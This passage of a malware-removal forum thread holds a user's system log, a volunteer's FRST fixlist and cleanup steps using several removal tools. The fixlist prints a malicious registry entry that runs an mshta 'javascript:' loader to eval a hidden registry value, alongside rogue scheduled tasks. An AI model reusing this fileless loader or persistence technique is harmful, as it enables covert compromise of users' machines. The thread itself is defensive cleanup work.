MSCONFIG\startupfolder: C:^Users^w7^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^WireShare On Startup.lnk => C:\Windows\pss\WireShare On Startup.lnk.Startup
MSCONFIG\startupreg: 360cloud => "C:\Program Files (x86)\360\360WangPan\360WangPan.exe" /autostart
MSCONFIG\startupreg: AdobeAAMUpdater-1.0 => "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: BaiduYunDetect => "C:\Users\w7\AppData\Roaming\baidu\BaiduNetdisk\YunDetectService.exe"
MSCONFIG\startupreg: BaiduYunGuanjia => "C:\Users\w7\AppData\Roaming\baidu\BaiduNetdisk\BaiduNetdisk.exe" AutoRun
MSCONFIG\startupreg: iKu => "C:\Program Files (x86)\YouKu\YoukuClient\YoukuDesktop.exe" iku://|reg|
MSCONFIG\startupreg: Ofics => C:\Windows\system32\config\systemprofile\AppData\Local\Ofics\12nbkm.exe
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
MSCONFIG\startupreg: Skype => "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: Wondershare Helper Compact.exe => "C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelperSetup.exe"
MSCONFIG\startupreg: YoukuMediaCenter => "C:\Users\w7\AppData\Roaming\ytmediacenter\YoukuMediaCenter.exe" iku://|start| --sr=r_hklm
MSCONFIG\startupreg: ZhiboBrowserNT => C:\Program Files (x86)\ZhiBoBrowser\ZhiboBrowserNT.exe
MSCONFIG\startupreg: ZhoboBrowserNotify => C:\Program Files (x86)\ZhiBoBrowser\ZhoboBrowserNotify.exe
MSCONFIG\startupreg: {4C0D3E90-5FCB-88B2-9A48-633FA7CC51E1} => C:\Windows\Temp\12nbkm.exe
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== Restore Points =========================
 
08-08-2017 08:19:29 Windows Update
08-08-2017 16:23:09 Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215
08-08-2017 16:23:20 Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24212
 
==================== Faulty Device Manager Devices =============
 
Name: Microsoft Virtual WiFi Miniport Adapter
Description: Microsoft Virtual WiFi Miniport Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: vwifimp
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: Microsoft Virtual WiFi Miniport Adapter #2
Description: Microsoft Virtual WiFi Miniport Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: vwifimp
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (08/10/2017 01:29:26 PM) (Source: RasClient) (EventID: 20227) (User: )
Description: CoId={4BB498BD-27E4-45A7-9341-8F0647F6730B}: The user DRAGON-EMPEROR\w7 dialed a connection named StrongVPN SSTP which has failed. The error code returned on failure is -2147013892.
 
Error: (08/10/2017 01:29:20 PM) (Source: RasClient) (EventID: 20227) (User: )
Description: CoId={C90E07B7-0E64-4384-8F2E-8B76CFAFDF04}: The user DRAGON-EMPEROR\w7 dialed a connection named StrongVPN SSTP which has failed. The error code returned on failure is -2147013892.
 
Error: (08/10/2017 01:29:14 PM) (Source: RasClient) (EventID: 20227) (User: )
Description: CoId={61E47F00-4FBC-48E8-96DD-927601FBFC94}: The user DRAGON-EMPEROR\w7 dialed a connection named StrongVPN SSTP which has failed. The error code returned on failure is -2147013892.
 
Error: (08/10/2017 01:29:08 PM) (Source: RasClient) (EventID: 20227) (User: )
Description: CoId={998C440F-0BC3-4282-9AC2-A5606AB93293}: The user DRAGON-EMPEROR\w7 dialed a connection named StrongVPN SSTP which has failed. The error code returned on failure is -2147013892.
 
Error: (08/10/2017 01:29:02 PM) (Source: RasClient) (EventID: 20227) (User: )
Description: CoId={9C2EDE0D-FE29-4844-ADD6-124C9005C49D}: The user DRAGON-EMPEROR\w7 dialed a connection named StrongVPN SSTP which has failed. The error code returned on failure is -2147013892.
 
Error: (08/10/2017 01:28:55 PM) (Source: RasClient) (EventID: 20227) (User: )
Description: CoId={CE13A89E-2B8D-4258-A1F9-294DA44CF756}: The user DRAGON-EMPEROR\w7 dialed a connection named StrongVPN SSTP which has failed. The error code returned on failure is -2147013892.
 
Error: (08/10/2017 01:28:49 PM) (Source: RasClient) (EventID: 20227) (User: )
Description: CoId={84C9B100-92EA-4237-BBB0-1648E03C6326}: The user DRAGON-EMPEROR\w7 dialed a connection named StrongVPN SSTP which has failed. The error code returned on failure is -2147013892.
 
Error: (08/10/2017 01:28:43 PM) (Source: RasClient) (EventID: 20227) (User: )
Description: CoId={0E5C49F6-3247-4ED0-AC9D-8DD43B6CAB83}: The user DRAGON-EMPEROR\w7 dialed a connection named StrongVPN SSTP which has failed. The error code returned on failure is -2147013892.
 
Error: (08/10/2017 01:28:37 PM) (Source: RasClient) (EventID: 20227) (User: )
Description: CoId={8782AC9E-C8A2-47D7-8C55-706209EA5400}: The user DRAGON-EMPEROR\w7 dialed a connection named StrongVPN SSTP which has failed. The error code returned on failure is -2147013892.
 
Error: (08/10/2017 01:28:31 PM) (Source: RasClient) (EventID: 20227) (User: )
Description: CoId={A2AD2BA6-E15B-495B-A76D-00764E420B5E}: The user DRAGON-EMPEROR\w7 dialed a connection named StrongVPN SSTP which has failed. The error code returned on failure is -2147013892.
 
 
System errors:
=============
Error: (08/10/2017 02:44:36 PM) (Source: NetBT) (EventID: 4311) (User: )
Description: Initialization failed because the driver device could not be created.
Use the string "%2" to identify the interface for which initialization
failed. It represents the MAC address of the failed interface or the 
Globally Unique Interface Identifier (GUID) if NetBT was unable to 
map from GUID to MAC address. If neither the MAC address nor the GUID were 
available, the string represents a cluster device name.
 
Error: (08/10/2017 01:29:25 PM) (Source: RasSstp) (EventID: 1) (User: )
Description: CoId={4BB498BD-27E4-45A7-9341-8F0647F6730B}:The initial Secure Socket Tunneling Protocol request could not be successfully sent to the server. This can be due to network connectivity issues or certificate (trust) issues. The detailed error message is provided below. Correct the problem and try again.
 
请求的名称有效,但是找不到请求的类型的数据。
 
Error: (08/10/2017 01:29:19 PM) (Source: RasSstp) (EventID: 1) (User: )
Description: CoId={C90E07B7-0E64-4384-8F2E-8B76CFAFDF04}:The initial Secure Socket Tunneling Protocol request could not be successfully sent to the server. This can be due to network connectivity issues or certificate (trust) issues. The detailed error message is provided below. Correct the problem and try again.
 
请求的名称有效,但是找不到请求的类型的数据。
 
Error: (08/10/2017 01:29:13 PM) (Source: RasSstp) (EventID: 1) (User: )
Description: CoId={61E47F00-4FBC-48E8-96DD-927601FBFC94}:The initial Secure Socket Tunneling Protocol request could not be successfully sent to the server. This can be due to network connectivity issues or certificate (trust) issues. The detailed error message is provided below. Correct the problem and try again.
 
请求的名称有效,但是找不到请求的类型的数据。
 
Error: (08/10/2017 01:29:07 PM) (Source: RasSstp) (EventID: 1) (User: )
Description: CoId={998C440F-0BC3-4282-9AC2-A5606AB93293}:The initial Secure Socket Tunneling Protocol request could not be successfully sent to the server. This can be due to network connectivity issues or certificate (trust) issues. The detailed error message is provided below. Correct the problem and try again.
 
请求的名称有效,但是找不到请求的类型的数据。
 
Error: (08/10/2017 01:29:01 PM) (Source: RasSstp) (EventID: 1) (User: )
Description: CoId={9C2EDE0D-FE29-4844-ADD6-124C9005C49D}:The initial Secure Socket Tunneling Protocol request could not be successfully sent to the server. This can be due to network connectivity issues or certificate (trust) issues. The detailed error message is provided below. Correct the problem and try again.
 
请求的名称有效,但是找不到请求的类型的数据。
 
Error: (08/10/2017 01:28:54 PM) (Source: RasSstp) (EventID: 1) (User: )
Description: CoId={CE13A89E-2B8D-4258-A1F9-294DA44CF756}:The initial Secure Socket Tunneling Protocol request could not be successfully sent to the server. This can be due to network connectivity issues or certificate (trust) issues. The detailed error message is provided below. Correct the problem and try again.
 
请求的名称有效,但是找不到请求的类型的数据。
 
Error: (08/10/2017 01:28:48 PM) (Source: RasSstp) (EventID: 1) (User: )
Description: CoId={84C9B100-92EA-4237-BBB0-1648E03C6326}:The initial Secure Socket Tunneling Protocol request could not be successfully sent to the server. This can be due to network connectivity issues or certificate (trust) issues. The detailed error message is provided below. Correct the problem and try again.
 
请求的名称有效,但是找不到请求的类型的数据。
 
Error: (08/10/2017 01:28:42 PM) (Source: RasSstp) (EventID: 1) (User: )
Description: CoId={0E5C49F6-3247-4ED0-AC9D-8DD43B6CAB83}:The initial Secure Socket Tunneling Protocol request could not be successfully sent to the server. This can be due to network connectivity issues or certificate (trust) issues. The detailed error message is provided below. Correct the problem and try again.
 
请求的名称有效,但是找不到请求的类型的数据。
 
Error: (08/10/2017 01:28:36 PM) (Source: RasSstp) (EventID: 1) (User: )
Description: CoId={8782AC9E-C8A2-47D7-8C55-706209EA5400}:The initial Secure Socket Tunneling Protocol request could not be successfully sent to the server. This can be due to network connectivity issues or certificate (trust) issues. The detailed error message is provided below. Correct the problem and try again.
 
请求的名称有效,但是找不到请求的类型的数据。
 
 
CodeIntegrity:
===================================
  Date: 2017-08-10 19:10:33.940
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2017-08-10 19:10:29.209
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2017-08-10 14:10:31.615
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2017-08-10 14:10:28.727
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2017-08-10 13:55:16.129
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2017-08-10 13:55:13.280
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2017-08-10 12:14:37.957
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\LgCoreTemp.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2017-08-10 12:14:37.917
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\LgCoreTemp.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2017-08-10 11:40:49.825
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\LgCoreTemp.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2017-08-10 11:40:49.785
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\LgCoreTemp.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i7-4710MQ CPU @ 2.50GHz
Percentage of memory in use: 46%
Total physical RAM: 16303.74 MB
Available physical RAM: 8717.57 MB
Total Virtual: 19601.92 MB
Available Virtual: 11438.68 MB
 
==================== Drives ================================
 
Drive c: (Velociraptor) (Fixed) (Total:119.14 GB) (Free:23.67 GB) NTFS
Drive d: (Tricerotops) (Fixed) (Total:206.16 GB) (Free:8.25 GB) NTFS
Drive e: (Pteronodon) (Fixed) (Total:303.82 GB) (Free:8.56 GB) NTFS
Drive f: (Megalodon) (Fixed) (Total:421.53 GB) (Free:5.93 GB) NTFS
Drive i: (Dragon Raptor) (Fixed) (Total:931.51 GB) (Free:4.25 GB) NTFS
Drive j: (Velociraptor Crucial) (Fixed) (Total:465.76 GB) (Free:7.05 GB) NTFS
Drive k: (Ankylosaurus) (Fixed) (Total:465.76 GB) (Free:4.17 GB) NTFS
Drive l: (Gigantoraptor) (Fixed) (Total:1863.01 GB) (Free:1040.73 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 119.2 GB) (Disk ID: BC982382)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=119.1 GB) - (Type=07 NTFS)
 
========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 8AEF1250)
Partition 1: (Not Active) - (Size=465.8 GB) - (Type=07 NTFS)
 
========================================================
Disk: 2 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 5F64FA4F)
Partition 1: (Not Active) - (Size=206.2 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=303.8 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=421.5 GB) - (Type=07 NTFS)
 
========================================================
Disk: 3 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: E70CA817)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)
 
========================================================
Disk: 4 (MBR Code: Windows 7 or 8) (Size: 1863 GB) (Disk ID: 6AD0455E)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=07 NTFS)
 
========================================================
Disk: 5 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 96378119)
Partition 1: (Not Active) - (Size=465.8 GB) - (Type=07 NTFS)
 
==================== End of Addition.txt ============================


#5 pystryker

pystryker

  • Malware Response Team
  • 730 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:06:08 PM

Posted 10 August 2017 - 06:08 PM

Hello :)

I'm analyzing your logs and preparing a fix. Please run the following tool and post the resulting log. :thumbup2:


Scan with CKScanner


Download CKScanner from here.

Important: Save it to your desktop.

Doubleclick CKScanner.exe and click Search For Files.(If you have Windows Vista / Windows 7 / Windows 8 please do a Right click on CKScanner.exe and select Run as Administrator.)

After a very short time, when the cursor hourglass disappears, click Save List To File.

A message box will verify that the file is saved.

Double-click the CKFiles.txt icon on your desktop and copy/paste the contents in your next reply.

Things I need to see in your next post:

CKFiles.txt

I close my topics if there is no response after 3 days. Please PM a moderator or myself to reopen your topic.

Please PM me only if I'm helping you with your computer issues and I have not responded in 2 days. Please remember, I'm a volunteer and sometimes life does get in the way. :)

Please stay with me until I declare your machine clean. Absence of symptoms does not ensure your machine is clean.

If you'd like to make a donation via Paypal, please click here.





#6 sirjoe1

sirjoe1
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:07:08 AM

Posted 11 August 2017 - 12:56 AM

Hello :)

I'm analyzing your logs and preparing a fix. Please run the following tool and post the resulting log. :thumbup2:


Scan with CKScanner


Download CKScanner from here.

Important: Save it to your desktop.

Doubleclick CKScanner.exe and click Search For Files.(If you have Windows Vista / Windows 7 / Windows 8 please do a Right click on CKScanner.exe and select Run as Administrator.)

After a very short time, when the cursor hourglass disappears, click Save List To File.

A message box will verify that the file is saved.

Double-click the CKFiles.txt icon on your desktop and copy/paste the contents in your next reply.

Things I need to see in your next post:

CKFiles.txt

Attached.

Edit: CKScanner 2.5 - Additional Security Risks - These are not necessarily bad

c:\users\w7\appdata\roaming\command & conquer 3 kane's wrath\profiles\dragonemperor\hotkeys.ini
c:\users\w7\appdata\roaming\command & conquer 3 tiberium wars\profiles\dragonjoe\hotkeys.ini
c:\users\w7\appdata\roaming\red alert 3\profiles\dragoviii\hotkeys.ini
c:\users\w7\appdata\roaming\red alert 3 uprising\profiles\dragonemperorjoe\hotkeys.ini
scanner sequence 3.CA.11.JWCPP0
 ----- EOF ----- 
 

Attached Files


Edited by sirjoe1, 11 August 2017 - 12:57 AM.


#7 pystryker

pystryker

  • Malware Response Team
  • 730 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:06:08 PM

Posted 11 August 2017 - 06:41 AM

Hello :)

Step 1: Fix with FRST

Important: Before performing this step, please move FRST64.exe from C:\Users\w7\Downloads to your Desktop or the fix will not work. All tools must be run from the Desktop.
  • Open notepad (Start =>All Programs => Accessories => Notepad). Please copy the entire contents of the code box below. (To do this highlight the contents of the box, right click on it and select copy.
  • Right-click in the open notepad and select Paste).
  • Save it on the desktop as fixlist.txt

Start
CreateRestorePoint:
CloseProcesses:
HKLM-x32\...\Run: [URPmedia] => C:\Windows\SysWOW64\regsvr32.exe C:\Windows\system32\config\systemprofile\AppData\Local\Ofics\pdevhelper.dll
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
GroupPolicy: Restriction - Chrome <==== ATTENTION
FF HKLM-x32\...\Firefox\Extensions: [daplinkchecker@speedbit.com] - C:\Program Files (x86)\DAP\daplinkchecker => not found
HKU\.DEFAULT\Software\Classes\b586d: "C:\Windows\system32\mshta.exe" "javascript:McWTU4a5i="TwujZb";N2E=new ActiveXObject("WScript.Shell");s6yGd="2GtCLhxi";QPf6U3=N2E.RegRead("HKCU\\software\\sfcc\\bymfflwgby");DNQ9RS="1OTKLf";eval(QPf6U3);M9MhRI7="LLhwqc";" <==== ATTENTION
Task: {74E7CA0C-4B28-4B51-B431-EAFEEC2EB294} - System32\Tasks\mjg2kyft => C:\Program Files\Common Files\0jkxweer\b2137hepploxh.exe
C:\Program Files\Common Files\0jkxweer
Task: {97CE1122-7664-4679-8B4A-3CA552606766} - System32\Tasks\lar3es1h => C:\Program Files\Common Files\4eubx1r5\c15b9htfdo2ym.exe
C:\Program Files\Common Files\4eubx1r5
Task: {C3A4EAAF-8237-4FAA-9680-EDB028564D41} - System32\Tasks\inyraupuat => C:\Windows\system32\config\systemprofile\AppData\Local\Stimtandax [Argument = /t 1632 2932] <==== ATTENTION
AlternateDataStreams: C:\ProgramData\TEMP:05E9FFE5 [99]
AlternateDataStreams: C:\ProgramData\TEMP:56E2E879 [86]
AlternateDataStreams: C:\ProgramData\TEMP:D5FBE8F9 [336]
AlternateDataStreams: C:\ProgramData\TEMP:DBC416F8 [86]
BHO-x32: SpeedBit Link Verification Helper -> {D5974A72-C81C-4DC3-BE77-A8A7BBC8864E} -> C:\Program Files (x86)\DAP\LinkVerifier.dll => No File
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [No File]
FF Plugin-x32: @cfca.com/SecEditCtl.BOC,version=1.0.0.9 -> C:\Windows\system32\npSecEditCtl.BOC.x86.dll [No File]
FF Plugin-x32: @tiancity.com/NxGame -> \NGM\npNxGameCN.dll [No File]
S3 Tosrfcom; no ImagePath
CMD: bitsadmin /reset /allusers
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state on
CMD: ipconfig /flushdns
Emptytemp:
End


NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.


Run FRST and press the Fix button just once and wait. The tool will make a log on the desktop (Fixlog.txt) please post it in your next reply.


Step 2: Junkware Removal Tool

Please download Junkware Removal Tool to your desktop.
  • Shut down your protection software now to avoid potential conflicts.
  • Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
  • Post the contents of JRT.txt into your next message.
Step 3: AdwCleaner

Download AdwCleaner by Xplode to your Desktop from the following link.

Download Link #1
Download Link #2

  • Right-click on AdwCleaner.exe and choose Run as administrator;
  • Click on Option and put a check mark on everything;
  • Click on Scan and let the program run unhindered;
  • When done, click on Clean and allow the system to reboot after it is done;
  • A log will be opened automatically after the restart. If not, it is located in C:\AdwCleaner\AdwCleaner[CX].txt, where X is replaced with a number;
  • Copy and Paste the contents of this log in your reply.
Step 4: Fresh FRST Logs
  • Start Farbar's Recovery Scan Tool and press the Scan button.
  • FRST will scan your system and produce one log this time. Please post it in your next reply.
Things I need to see in your next post:

Please post each of these logs as a separate reply in this thread.

Fixlog.txt Log

Junkware Removal Tool Log

AdwCleaner Log

Fresh FRST.txt Log

Fresh Addition.txt Log

I close my topics if there is no response after 3 days. Please PM a moderator or myself to reopen your topic.

Please PM me only if I'm helping you with your computer issues and I have not responded in 2 days. Please remember, I'm a volunteer and sometimes life does get in the way. :)

Please stay with me until I declare your machine clean. Absence of symptoms does not ensure your machine is clean.

If you'd like to make a donation via Paypal, please click here.





#8 sirjoe1

sirjoe1
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:07:08 AM

Posted 11 August 2017 - 08:45 AM

JRT.txt Attached File  JRT.txt   2.83KB   1 downloads



#9 sirjoe1

sirjoe1
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:07:08 AM

Posted 11 August 2017 - 08:46 AM

Fixlog Attached File  Fixlog.txt   6.77KB   1 downloads



#10 sirjoe1

sirjoe1
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:07:08 AM

Posted 11 August 2017 - 08:55 AM

adwcleanerlog

Attached Files


Edited by sirjoe1, 11 August 2017 - 08:59 AM.


#11 sirjoe1

sirjoe1
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:07:08 AM

Posted 11 August 2017 - 09:10 AM

additionAttached File  Addition.txt   65.66KB   3 downloads



#12 sirjoe1

sirjoe1
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:07:08 AM

Posted 11 August 2017 - 09:12 AM

frstlog Attached File  FRST.txt   47.64KB   2 downloads



#13 pystryker

pystryker

  • Malware Response Team
  • 730 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:06:08 PM

Posted 11 August 2017 - 09:25 AM

Hello :)

Please do not attach the logs, but copy and paste them as a reply. It makes them easier to analyze. How is the machine running? Has the pop-up stopped occurring? I will study your logs this evening when I get in from work and post further instructions then. Please let me know if the pop up has stopped.

I close my topics if there is no response after 3 days. Please PM a moderator or myself to reopen your topic.

Please PM me only if I'm helping you with your computer issues and I have not responded in 2 days. Please remember, I'm a volunteer and sometimes life does get in the way. :)

Please stay with me until I declare your machine clean. Absence of symptoms does not ensure your machine is clean.

If you'd like to make a donation via Paypal, please click here.





#14 pystryker

pystryker

  • Malware Response Team
  • 730 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:06:08 PM

Posted 11 August 2017 - 07:28 PM

Please disable your antivirus for the duration of my instructions. Don't forget to re-enable them after you have completed the steps.


Step 1: Scan with Malwarebytes


Start the progamme and select update
Once it has updated select Settings > Detection and Protection
Tick Scan for rootkits
Go back to the Dashboard and select Scan Now
If threats are detected, click the Apply Actions button, MBAM will ask for a reboot.
On completion of the scan (or after the reboot), start MBAM,
Click History, then Application Logs, then check the Select box by the first Scan Log in the list.
Click View, then click Export, select text file and save to the desktop as MBAM.txt and post in your next reply.



Step 2: Scan with ESET Online Scanner

Disable your security programs which includes but not limited to anti-virus, anti-malware, anti-spyware et cetera. Peruse this for additional information.
  • Download esetsmartinstaller_enu.exe by clicking here.
  • Right-click on the program and choose Run as administrator.
  • Accept their terms and condition and proceed.
  • Install Add-On/Active X if prompted.
  • From the Computer Scan Setting check the following box --
  • Enable detection for potentially unwanted programs
  • Click on Advanced Setting --
  • Check the box beside Remove Found Threats;
  • Check the box beside Scan archives
  • Check the box beside Scan for potentially unsafe applications
  • Check the box beside Enable Anti-Stealth Technology
  • Click on Start and wait for the virus signature database to update.
  • The online scan will begin automatically and can take several hours.
  • Note:
Do not touch either the Mouse or keyboard during the scan. Otherwise it may stall.
  • After the Scan finishes --
  • If no threats were found:
  • Put a checkmark in Uninstall application on close.
  • Close the program and report that nothing was found
  • If threats were found:
  • Open the file located in C:\Program Files\ESET\ESET Online Scanner\log.txt (32-bit) or C:\Program Files (x86)\ESET\ESET Online Scanner\log.txt (64-bit).
  • Copy and Paste contents of the log file in your next reply.
Note: Enable your security programs afterwards.

Step 3: SecurityCheck Scan


Download Security Checkby screen317 from here or here.
  • Save it to your Desktop.
  • Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.
  • NOTE: If SecurityCheck aborts and you get the following message: UNSUPPORTED OPERATING SYSTEM! ABORTED! try rebooting the system and then run SecurityCheck again.
  • A Notepad document should open automatically called checkup.txt; please post the contents of that document.
Things I need to see in your next post:
  • ESET Scan Log
  • MBAM Log
  • SecurityCheck Log

I close my topics if there is no response after 3 days. Please PM a moderator or myself to reopen your topic.

Please PM me only if I'm helping you with your computer issues and I have not responded in 2 days. Please remember, I'm a volunteer and sometimes life does get in the way. :)

Please stay with me until I declare your machine clean. Absence of symptoms does not ensure your machine is clean.

If you'd like to make a donation via Paypal, please click here.





#15 sirjoe1

sirjoe1
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:07:08 AM

Posted 12 August 2017 - 02:54 AM

Thanks a bunch, no more popup on startup. Anti virus and malwarebytes all clean.  :guitar:  :thumbup2: Oh wait.. malwatebytes detected something:

 
Registry Key: 2
PUP.Optional.oTweakRegistryCleaner, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\RegistryCleaner.exe, No Action By User, [8380], [398949],1.0.2566
PUP.Optional.oTweakRegistryCleaner, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\RegistryCleaner.exe, No Action By User, [8380], [398949],1.0.2566
 
Registry Value: 1
Backdoor.Bot, HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|MICROSOFT UPDATE, No Action By User, [48], [197481],1.0.2566 
 

Edited by sirjoe1, 12 August 2017 - 02:58 AM.





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users